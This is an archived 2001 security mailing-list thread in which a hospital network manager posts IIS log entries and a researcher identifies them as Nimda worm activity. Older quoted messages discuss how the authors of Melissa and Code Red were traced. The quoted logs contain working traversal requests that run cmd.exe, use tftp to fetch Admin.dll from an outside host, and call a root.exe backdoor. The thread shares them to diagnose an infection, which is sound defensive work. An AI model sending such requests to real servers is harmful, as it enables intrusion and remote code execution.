Oh, I didn't notice the followup questions you asked the first time. I don't know about the structure of your logs. But are you 206.98.124.52? Could someone who reads IIS logs say if this is him sending or receiving GETs? And this is definitely Nimda. I just don't know if you're the target or the culprit. If you haven't upgraded, I'm tempting to believe you're infected and attacking others. The TFTP command shows up only on or after infection. And ADMIN.DLL (Nimda is admin spelt backwards) is also something that shows up after infection. But then you say you don't have it... Jimmy > -----Original Message----- > From: J.Michael Cuciti [SMTP:mcuciti@private] > Sent: Friday, September 21, 2001 1:44 PM > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri > Cc: crime@private > Subject: Re: [RE: Any leads?] > > All: > > I still have a script trying to run, but the location and folder doesn't > exist. The is what I found in my log file: > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, > 304, > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, > 304, > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, > 273, > 403, 5, GET, /scripts/root.exe, /c+dir, > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, > 1652, > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, > 243, > 500, 123, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, > > If anybody knows what this is, please 'spain it to me. > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I inherited this, not > my > fault :-) ) > > In the event log I see this same type of message running every few > minutes. > The script is supposedly running from > \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist. > > Thanks... > > Mike Cuciti > Network Service and Support MAnager > Tuality Healthcare > 681.1749 > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote: > >The Melissa author was caught because he posted the infectious document > >from his own AOL account to a news group, rather than releasing it > >through a hacked account. His guilt was confirmed when the serial number > >in the document matched the PC in the dumpster outside his bedroom :-) > > No. He used a hacked acct. But we identified the exact time of the use > of > the acct (newsgroup posting message ID) and the FBI traced the phone > records. > > And the PC was destroyed and never located. > > Where did you get your version of the story? > > >But Code Red and its derivatives is not an Office document, and > >therefore has no serial numbers. That investigators appear to have no > >leads months after Code Red appeared tells me that it was likely > >released to the wild from a compromised machine, or perhaps > >simultaneously released from multiple compromised machines. If the > >author(s) were good, then those compromised machines were initially > >attacked from other compromised machines. Likely all of these initial > >release vector machines have long since been wiped and re-installed, and > >the links to the author(s) have been cut. > > We have some "first instances" of traffic. I don't know what the FBI's > doing with the information gathered so far. But I agree that it's > difficult > and not likely. > > Jimmy
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:43 PDT